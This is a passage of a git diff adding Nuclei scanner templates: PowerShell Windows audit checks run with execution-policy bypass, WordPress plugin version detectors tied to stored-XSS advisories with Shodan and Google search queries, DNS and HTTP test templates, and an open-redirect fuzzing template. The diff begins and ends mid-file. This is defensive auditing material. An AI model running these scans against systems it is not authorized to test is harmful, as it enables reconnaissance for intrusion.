- pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-WebConfiguration -Filter system.ftpServer/security/authentication/basicAuthentication -PSPath IIS:\ -ErrorAction SilentlyContinue + + matchers: + - type: word + words: + - "Deny" \ No newline at end of file diff --git a/poc/ftp/ftp-service-running.yaml b/poc/ftp/ftp-service-running.yaml new file mode 100644 index 0000000000..8e27ef727d --- /dev/null +++ b/poc/ftp/ftp-service-running.yaml @@ -0,0 +1,32 @@ +id: ftp-service-running + +info: + name: FTP Service Running + author: princechaddha + severity: high + description: Checks if the FTP service is running. + impact: | + FTP transmits data in plaintext, which can lead to unauthorized access and interception of credentials. + remediation: | + Disable the FTP service and use secure alternatives like SFTP. + tags: windows,ftp,service,insecure,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-Service -Name ftpsvc | Select-Object -ExpandProperty Status + + matchers: + - type: word + words: + - "Running" diff --git a/poc/fuzz/fuzz-headless.yaml b/poc/fuzz/fuzz-headless.yaml new file mode 100644 index 0000000000..39d4bce694 --- /dev/null +++ b/poc/fuzz/fuzz-headless.yaml @@ -0,0 +1,31 @@ +id: headless-query-fuzzing + +info: + name: Example Query Fuzzing + author: pdteam + severity: info + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + payloads: + redirect: + - "blog.com" + - "portal.com" + + fuzzing: + - part: query + mode: single + type: replace + fuzz: + - "https://{{redirect}}" + + matchers: + - type: word + part: body + words: + - "{{redirect}}" diff --git a/poc/header/headless-header-status-test.yaml b/poc/header/headless-header-status-test.yaml new file mode 100644 index 0000000000..1b53d22522 --- /dev/null +++ b/poc/header/headless-header-status-test.yaml @@ -0,0 +1,24 @@ +id: headless-header-status-test + +info: + name: headless header + status test + author: pdteam + severity: info + +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + + matchers-condition: and + matchers: + - type: word + part: header + words: + - text/plain + + - type: status + status: + - 200 diff --git a/poc/http/http-get.yaml b/poc/http/http-get.yaml new file mode 100644 index 0000000000..93181f74bd --- /dev/null +++ b/poc/http/http-get.yaml @@ -0,0 +1,15 @@ +id: basic-get-with-cert + +info: + name: Basic GET with Cert + author: pdteam + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - "Hello" \ No newline at end of file diff --git a/poc/http/http-matcher-extractor-dy-extractor.yaml b/poc/http/http-matcher-extractor-dy-extractor.yaml new file mode 100644 index 0000000000..eb26d50bf7 --- /dev/null +++ b/poc/http/http-matcher-extractor-dy-extractor.yaml @@ -0,0 +1,36 @@ +id: http-matcher-extractor-dy-extractor +info: + name: HTTP matcher and extractor & dynamic extractor + description: > + Edgecase to test for a combination of matchers , extractors and dynamic extractors + author: pdteam + severity: info + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + - | + GET {{absolutePath}} HTTP/1.1 + + req-condition: true + extractors: + - type: regex + internal: true + part: body_1 + name: absolutePath + regex: + - '' + group: 1 + - type: regex + internal: false + part: body_2 + name: title + regex: + - ']*>([^<]+)' + group: 1 + matchers: + - type: regex + part: body_2 + regex: + - ']*>([^<]+)' \ No newline at end of file diff --git a/poc/http/http-preprocessor.yaml b/poc/http/http-preprocessor.yaml new file mode 100644 index 0000000000..795e86150b --- /dev/null +++ b/poc/http/http-preprocessor.yaml @@ -0,0 +1,17 @@ +id: http-preprocessor + +info: + name: Test Http Preprocessor + author: pdteam + severity: info + +http: + - raw: + - | + GET /?test={{randstr}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/http/multi-http-var-sharing.yaml b/poc/http/multi-http-var-sharing.yaml new file mode 100644 index 0000000000..606a036504 --- /dev/null +++ b/poc/http/multi-http-var-sharing.yaml @@ -0,0 +1,36 @@ +id: multi-http-var-sharing + +info: + name: Multi HTTP var sharing + author: pdteam + severity: info + description: | + A template which has multiple HTTP requests block and variables are shared between them + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "This is test matcher text" + negative: true + internal: true + + extractors: + - type: dsl + name: ffff + dsl: + - status_code + internal: true + + - method: GET + path: + - "{{BaseURL}}/{{ffff}}" + + matchers: + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/http/net-https-timeout.yaml b/poc/http/net-https-timeout.yaml new file mode 100644 index 0000000000..a0d106fc0b --- /dev/null +++ b/poc/http/net-https-timeout.yaml @@ -0,0 +1,25 @@ +id: net-https-timeout + +info: + name: Example Network template which times out + author: pdteam + severity: high + description: Example Network template to send HTTPS request which times out + + +tcp: + - host: + - "tls://{{Hostname}}" + port: 443 + inputs: + # noticable difference between this and net-https.yaml is that here we don't send the Connection: close header + # and hence connection will remain open until server closes it. This can be a DOS vector in nuclei + # as it waits for server to close the connection. now we have set a default timeout of 5 seconds and if server responds but doesn't close the connection + # then nuclei will close connection but doesn't fail the request since we already have response data from server + # this feature is only required for `read-all: true` to work properly + - data: "GET / HTTP/1.1\r\nHost: {{Hostname}}\r\n\r\n" + read-all: true + extractors: + - type: dsl + dsl: + - "len(data)" \ No newline at end of file diff --git a/poc/http/net-https.yaml b/poc/http/net-https.yaml new file mode 100644 index 0000000000..94914560f2 --- /dev/null +++ b/poc/http/net-https.yaml @@ -0,0 +1,20 @@ +id: net-https + +info: + name: Example Network template to send HTTPS request + author: pdteam + severity: high + description: Example Network template to send HTTPS request + + +tcp: + - host: + - "tls://{{Hostname}}" + port: 443 + inputs: + - data: "GET / HTTP/1.1\r\nHost: {{Hostname}}\r\nConnection: close\r\n\r\n" + read-all: true + extractors: + - type: dsl + dsl: + - "len(data)" \ No newline at end of file diff --git a/poc/javascript/nodejs-framework-exceptions.yaml b/poc/javascript/nodejs-framework-exceptions.yaml new file mode 100644 index 0000000000..09ab0b67bb --- /dev/null +++ b/poc/javascript/nodejs-framework-exceptions.yaml @@ -0,0 +1,32 @@ +id: nodejs-framework-exceptions + +info: + name: Node.js Framework Exceptions + author: Aayush Dhakal + severity: medium + description: Detects suspicious Node.js framework exceptions that could indicate exploitation attempts + reference: + - https://expressjs.com/en/guide/error-handling.html + - https://nodejs.org/en/docs/guides + tags: file, logs, nodejs + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'TypeError' + - 'ReferenceError' + - 'SyntaxError' + - 'ValidationError' + - 'UnauthorizedError' + - 'ForbiddenError' + - 'NotFoundError' + - 'InternalServerError' + - 'BadRequestError' + - 'MongoError' + - 'SequelizeDatabaseError' diff --git a/poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml b/poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml new file mode 100644 index 0000000000..841ccb9fe0 --- /dev/null +++ b/poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml @@ -0,0 +1,59 @@ +id: sms-alert-e7666c2e9949971a8cf15a29d904cf8b + +info: + name: > + SMSAlert - WooCommerce <= 3.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via sa_subscribe Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sms-alert/" + google-query: inurl:"/wp-content/plugins/sms-alert/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sms-alert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sms-alert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sms-alert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.5') \ No newline at end of file diff --git a/poc/nodejs/nodejs-framework-exceptions.yaml b/poc/nodejs/nodejs-framework-exceptions.yaml new file mode 100644 index 0000000000..09ab0b67bb --- /dev/null +++ b/poc/nodejs/nodejs-framework-exceptions.yaml @@ -0,0 +1,32 @@ +id: nodejs-framework-exceptions + +info: + name: Node.js Framework Exceptions + author: Aayush Dhakal + severity: medium + description: Detects suspicious Node.js framework exceptions that could indicate exploitation attempts + reference: + - https://expressjs.com/en/guide/error-handling.html + - https://nodejs.org/en/docs/guides + tags: file, logs, nodejs + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'TypeError' + - 'ReferenceError' + - 'SyntaxError' + - 'ValidationError' + - 'UnauthorizedError' + - 'ForbiddenError' + - 'NotFoundError' + - 'InternalServerError' + - 'BadRequestError' + - 'MongoError' + - 'SequelizeDatabaseError' diff --git a/poc/other/a.yaml b/poc/other/a.yaml new file mode 100644 index 0000000000..0e51245817 --- /dev/null +++ b/poc/other/a.yaml @@ -0,0 +1,17 @@ +id: dns-a-query-example + +info: + name: Test DNS A Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: A + class: inet + recursion: true + retries: 3 + matchers: + - type: word + words: + - "1.1.1.1" diff --git a/poc/other/aaaa.yaml b/poc/other/aaaa.yaml new file mode 100644 index 0000000000..58a2e496ce --- /dev/null +++ b/poc/other/aaaa.yaml @@ -0,0 +1,17 @@ +id: dns-aaaa-query-example + +info: + name: Test DNS AAAA Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: AAAA + class: inet + recursion: true + retries: 3 + matchers: + - type: word + words: + - "2606:4700:4700::1001" diff --git a/poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml b/poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml new file mode 100644 index 0000000000..245a99ac24 --- /dev/null +++ b/poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml @@ -0,0 +1,59 @@ +id: affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d + +info: + name: > + affiliate-toolkit <= 3.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via atkp_product Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f86568f-dcdd-44fb-905a-9c5474f56515?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/affiliate-toolkit-starter/" + google-query: inurl:"/wp-content/plugins/affiliate-toolkit-starter/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,affiliate-toolkit-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/affiliate-toolkit-starter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "affiliate-toolkit-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.5') \ No newline at end of file diff --git a/poc/other/allow-untrusted-certificates.yaml b/poc/other/allow-untrusted-certificates.yaml new file mode 100644 index 0000000000..77877ba498 --- /dev/null +++ b/poc/other/allow-untrusted-certificates.yaml @@ -0,0 +1,29 @@ +id: allow-untrusted-certificates + +info: + name: System Allows Untrusted Certificates + author: princechaddha + severity: medium + description: Checks if the system allows untrusted certificates to be installed. + impact: | + Installing untrusted certificates can lead to man-in-the-middle attacks and data theft. + remediation: | + Ensure that untrusted certificates are blocked and only allow trusted certificates to be installed. + tags: certificates,untrusted,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + pattern: "*.ps1" + source: | + $certs = Get-ChildItem -Path Cert:\CurrentUser\Disallowed; if ($certs.Count -gt 0) { "Misconfigured certificates detected:`n" + ($certs.Subject -join "`n") } else { "No untrusted certificates detected." } + + matchers: + - type: word + words: + - "Misconfigured certificates detected" diff --git a/poc/other/anonymous-sam-enumeration-enabled.yaml b/poc/other/anonymous-sam-enumeration-enabled.yaml new file mode 100644 index 0000000000..18cff69cde --- /dev/null +++ b/poc/other/anonymous-sam-enumeration-enabled.yaml @@ -0,0 +1,32 @@ +id: anonymous-sam-enumeration-enabled + +info: + name: Anonymous Enumeration of SAM Accounts Enabled + author: princechaddha + severity: high + description: Checks if anonymous users can enumerate Security Account Manager (SAM) accounts, posing a security risk. + impact: | + Anonymous enumeration of SAM accounts exposes user information that could be leveraged in further attacks. + remediation: | + Disable anonymous enumeration of SAM accounts to prevent unauthorized information gathering. + tags: windows,sam,enumeration,anonymous,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'RestrictAnonymousSAM' + + matchers: + - type: word + words: + - "restrictanonymoussam : 0" diff --git a/poc/other/anonymous-sid-enumeration-enabled.yaml b/poc/other/anonymous-sid-enumeration-enabled.yaml new file mode 100644 index 0000000000..fc36422541 --- /dev/null +++ b/poc/other/anonymous-sid-enumeration-enabled.yaml @@ -0,0 +1,32 @@ +id: anonymous-sid-enumeration-enabled + +info: + name: Anonymous SID Enumeration Enabled + author: princechaddha + severity: medium + description: Checks if anonymous users can enumerate Security Identifiers (SIDs). + impact: | + Allowing anonymous SID enumeration can expose user account details and increase the risk of unauthorized access. + remediation: | + Restrict anonymous access to SID enumeration to enhance security. + tags: windows,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'EveryoneIncludesAnonymous' + + matchers: + - type: word + words: + - "everyoneincludesanonymous : 1" diff --git a/poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml b/poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml new file mode 100644 index 0000000000..95caa9d3a7 --- /dev/null +++ b/poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml @@ -0,0 +1,59 @@ +id: arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59 + +info: + name: > + Arconix Shortcodes <= 2.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via box Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.13') \ No newline at end of file diff --git a/poc/other/aspnet-framework-exceptions.yaml b/poc/other/aspnet-framework-exceptions.yaml new file mode 100644 index 0000000000..cfd5e35f55 --- /dev/null +++ b/poc/other/aspnet-framework-exceptions.yaml @@ -0,0 +1,24 @@ +id: aspnet-framework-exceptions + +info: + name: ASP.NET Framework Exceptions + author: Aayush Dhakal + severity: medium + description: Detects suspicious ASP.NET framework exceptions that could indicate exploitation attempts + reference: + - https://docs.microsoft.com/en-us/dotnet/api/system.web.httpexception + tags: file, logs, aspnet + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'HttpException' + - 'InvalidOperationException' + - 'UnauthorizedAccessException' + - 'NotFound' diff --git a/poc/other/audit-logging-disabled.yaml b/poc/other/audit-logging-disabled.yaml new file mode 100644 index 0000000000..702b4cd190 --- /dev/null +++ b/poc/other/audit-logging-disabled.yaml @@ -0,0 +1,37 @@ +id: audit-logging-disabled + +info: + name: Audit Logging Disabled + author: princechaddha + severity: high + description: Check if audit logging for critical events is disabled. + impact: | + Disabling audit logging can lead to a lack of traceability for security incidents and breaches. + remediation: | + Enable audit logging for all critical security events to maintain a proper audit trail. + tags: windows,audit-logging,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + AuditPol /get /category:"Account Logon" + AuditPol /get /category:"Account Management" + + matchers: + - type: word + words: + - "User Account Management No Auditing" + - "Computer Account Management No Auditing" + - "Security Group Management No Auditing" + - "Credential Validation No Auditing" + - "Kerberos Authentication Service No Auditing" diff --git a/poc/other/audit-logs-not-archived.yaml b/poc/other/audit-logs-not-archived.yaml new file mode 100644 index 0000000000..4526d12fa1 --- /dev/null +++ b/poc/other/audit-logs-not-archived.yaml @@ -0,0 +1,29 @@ +id: audit-logs-not-archived + +info: + name: Audit Logs Not Archived When Full + author: princechaddha + severity: high + description: Checks if audit logs are not archived when full, leading to potential data loss. + impact: | + Failure to archive full logs could result in the loss of crucial audit data, hindering forensic analysis and incident response. + remediation: | + Enable log archiving to preserve important security event data. + tags: windows,audit,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + pattern: "*.ps1" + source: | + wevtutil get-log security + + matchers: + - type: word + words: + - "retention: false" diff --git a/poc/other/auto-logon-enabled.yaml b/poc/other/auto-logon-enabled.yaml new file mode 100644 index 0000000000..0c8ee01ebb --- /dev/null +++ b/poc/other/auto-logon-enabled.yaml @@ -0,0 +1,32 @@ +id: auto-logon-enabled + +info: + name: AutoLogon Enabled + author: princechaddha + severity: medium + description: Checks if automatic logon is enabled, allowing users to bypass login prompts. + impact: | + AutoLogon can allow unauthorized users to access the system without authentication. + remediation: | + Disable AutoLogon to ensure users are prompted for credentials. + tags: autologon,login,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'AutoAdminLogon' -ErrorAction SilentlyContinue).AutoAdminLogon -eq '1' + + matchers: + - type: word + words: + - "True" diff --git a/poc/other/automatic-windows-updates-disabled.yaml b/poc/other/automatic-windows-updates-disabled.yaml new file mode 100644 index 0000000000..70473d11d5 --- /dev/null +++ b/poc/other/automatic-windows-updates-disabled.yaml @@ -0,0 +1,32 @@ +id: automatic-windows-updates-disabled + +info: + name: Automatic Windows Updates Disabled + author: princechaddha + severity: medium + description: Checks if automatic Windows Updates are disabled. + impact: | + Without regular updates, systems may miss important security patches. + remediation: | + Enable automatic Windows Updates to ensure timely updates for system security. + tags: windows,updates,disabled,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name NoAutoUpdate | Select-Object -ExpandProperty NoAutoUpdate + + matchers: + - type: word + words: + - "1" \ No newline at end of file diff --git a/poc/other/autoplay-removable-media-enabled.yaml b/poc/other/autoplay-removable-media-enabled.yaml new file mode 100644 index 0000000000..b669788443 --- /dev/null +++ b/poc/other/autoplay-removable-media-enabled.yaml @@ -0,0 +1,32 @@ +id: autoplay-removable-media-enabled + +info: + name: AutoPlay Enabled for Removable Media + author: princechaddha + severity: medium + description: Checks if AutoPlay is enabled for removable media, which can automatically execute malicious software. + impact: | + Enabling AutoPlay may allow the automatic execution of malware from external devices, increasing the attack surface. + remediation: | + Disable AutoPlay for all removable media to mitigate potential security threats. + tags: windows,autoplay,removable-media,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers' -Name 'DisableAutoplay' + + matchers: + - type: word + words: + - "DisableAutoplay : 0" diff --git a/poc/other/autorun-scripts-startup-folder.yaml b/poc/other/autorun-scripts-startup-folder.yaml new file mode 100644 index 0000000000..695ac5c82e --- /dev/null +++ b/poc/other/autorun-scripts-startup-folder.yaml @@ -0,0 +1,33 @@ +id: autorun-scripts-startup-folder + +info: + name: Autorun Scripts in Startup Folder + author: princechaddha + severity: medium + description: Detect unauthorized scripts or executables in startup folders. + impact: | + Unauthorized scripts or executables can lead to the execution of malicious software during system startup. + remediation: | + Remove any unauthorized scripts or executables from the startup folder and implement security policies to restrict future unauthorized additions. + tags: windows,startup,autorun,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ChildItem -Path "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" + + matchers: + - type: word + words: + - ".exe" + - ".ps1" diff --git a/poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml b/poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml new file mode 100644 index 0000000000..93174c8484 --- /dev/null +++ b/poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml @@ -0,0 +1,59 @@ +id: beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55 + +info: + name: > + Beaver Builder – WordPress Page Builder <= 2.8.4.2 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via Button Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.4.2') \ No newline at end of file diff --git a/poc/other/cname.yaml b/poc/other/cname.yaml new file mode 100644 index 0000000000..f4ddb8a2ed --- /dev/null +++ b/poc/other/cname.yaml @@ -0,0 +1,18 @@ +id: dns-cname-query-example + +info: + name: Test DNS CNAME Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: CNAME + class: inet + recursion: true + retries: 3 + matchers: + - type: word + part: all + words: + - "CNAME" diff --git a/poc/other/code-template-1.yaml b/poc/other/code-template-1.yaml new file mode 100644 index 0000000000..81a9773ae0 --- /dev/null +++ b/poc/other/code-template-1.yaml @@ -0,0 +1,22 @@ +id: code-template-1 + +info: + name: code-template-1 + author: tovask + severity: info + tags: code + +code: + - engine: + - py + - python3 + - python + source: | + print("hello from first") + extractors: + - type: regex + name: extracted + regex: + - 'hello from (.*)' + group: 1 +# digest: 490a00463044022050da011362cf08c2cb81e812c7f86d7282afe0562d4bf00d390f1300d19bc910022029e9d305da69e941ac18797645aecb217abde6557f891e141301b48e89a3c0cd:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/code-template-2.yaml b/poc/other/code-template-2.yaml new file mode 100644 index 0000000000..1fb9805501 --- /dev/null +++ b/poc/other/code-template-2.yaml @@ -0,0 +1,21 @@ +id: code-template-2 + +info: + name: code-template-2 + author: tovask + severity: info + tags: code + +code: + - engine: + - py + - python3 + - python + source: | + import os + print("hello from " + os.getenv("extracted")) + matchers: + - type: word + words: + - "hello from first" +# digest: 4b0a00483046022100b3b8759c0df028455eb59b1433ac240e5d4604b011bb0c63680bd3cc159ac6f0022100f44aa11b640d11ad0e2902897f4eb51666ab3cd83c31dfd2590f6e43391e39b0:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/code-value-share-workflow.yaml b/poc/other/code-value-share-workflow.yaml new file mode 100644 index 0000000000..a7c27b5eab --- /dev/null +++ b/poc/other/code-value-share-workflow.yaml @@ -0,0 +1,12 @@ +id: code-value-sharing-workflow + +info: + name: Code Value Sharing Workflow + author: tovask + severity: info + tags: code + +workflows: + - template: workflow/code-template-1.yaml + subtemplates: + - template: workflow/code-template-2.yaml diff --git a/poc/other/complex-conditions.yaml b/poc/other/complex-conditions.yaml new file mode 100644 index 0000000000..bd1e66be5d --- /dev/null +++ b/poc/other/complex-conditions.yaml @@ -0,0 +1,23 @@ +id: complex-conditions-workflow + +info: + name: Complex Conditions Workflow + author: tovask + severity: info + description: Workflow to test a complex scenario, e.g. race conditions when evaluating the results of the templates + +workflows: + - template: workflow/match-1.yaml + subtemplates: + - template: workflow/nomatch-1.yaml + subtemplates: + - template: workflow/match-2.yaml + - template: workflow/match-3.yaml + - template: workflow/match-2.yaml + matchers: + - name: test-matcher + subtemplates: + - template: workflow/nomatch-1.yaml + subtemplates: + - template: workflow/match-1.yaml + - template: workflow/match-3.yaml diff --git a/poc/other/conditional-flow.yaml b/poc/other/conditional-flow.yaml new file mode 100644 index 0000000000..8cb687b248 --- /dev/null +++ b/poc/other/conditional-flow.yaml @@ -0,0 +1,23 @@ +id: ghost-blog-detection +info: + name: Ghost blog detection + author: pdteam + severity: info + + +flow: dns() && http() + + +dns: + - name: "{{FQDN}}" + type: CNAME + +http: + - method: GET + path: + - "{{BaseURL}}?ref={{dns_cname}}" + + matchers: + - type: word + words: + - "ghost.io" \ No newline at end of file diff --git a/poc/other/disable-path-automerge.yaml b/poc/other/disable-path-automerge.yaml new file mode 100644 index 0000000000..8748f2ecdf --- /dev/null +++ b/poc/other/disable-path-automerge.yaml @@ -0,0 +1,21 @@ +id: test + +info: + name: test + author: pdteam + severity: info + +http: + - raw: + - | + GET /api/v1/test?id=123 HTTP/1.1 + Host: {{Hostname}} + - | + GET HTTP/1.1 + Host: {{Hostname}} + disable-path-automerge: true + matchers: + - type: status + status: + - 200 + \ No newline at end of file diff --git a/poc/other/display-last-username-enabled.yaml b/poc/other/display-last-username-enabled.yaml new file mode 100644 index 0000000000..443dfb7fb0 --- /dev/null +++ b/poc/other/display-last-username-enabled.yaml @@ -0,0 +1,32 @@ +id: display-last-username-enabled + +info: + name: Do Not Display Last User Name Disabled + author: princechaddha + severity: medium + description: Verifies if the system displays the last logged-in username, which may aid unauthorized access attempts. + impact: | + Displaying the last user name on the login screen can assist attackers in targeting accounts. + remediation: | + Enable the policy to hide the last logged-in username. + tags: login,username,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'DontDisplayLastUserName' + + matchers: + - type: word + words: + - "0" diff --git a/poc/other/dns-ns-probe.yaml b/poc/other/dns-ns-probe.yaml new file mode 100644 index 0000000000..ef88e6dd92 --- /dev/null +++ b/poc/other/dns-ns-probe.yaml @@ -0,0 +1,43 @@ +id: dns-ns-probe + +info: + name: Nuclei flow dns ns probe + author: pdteam + severity: info + description: Description of the Template + reference: https://example-reference-link + +flow: | + dns("fetch-ns"); + for(let ns of template["nameservers"]) { + set("nameserver",ns); + dns("probe-ns"); + }; + +dns: + - id: "fetch-ns" + name: "{{FQDN}}" + type: NS + matchers: + - type: word + words: + - "IN\tNS" + internal: true + extractors: + - type: regex + internal: true + name: "nameservers" + group: 1 + regex: + - "IN\tNS\t(.+)" + + - id: "probe-ns" + name: "{{nameserver}}" + type: A + class: inet + retries: 3 + recursion: true + extractors: + - type: dsl + dsl: + - "a" \ No newline at end of file diff --git a/poc/other/download-unsigned-activex-allowed.yaml b/poc/other/download-unsigned-activex-allowed.yaml new file mode 100644 index 0000000000..2459ae4b0e --- /dev/null +++ b/poc/other/download-unsigned-activex-allowed.yaml @@ -0,0 +1,32 @@ +id: download-unsigned-activex-allowed + +info: + name: Download of Unsigned ActiveX Controls Allowed + author: princechaddha + severity: high + description: Verifies if the system allows downloading and installing unsigned ActiveX controls. + impact: | + Allowing 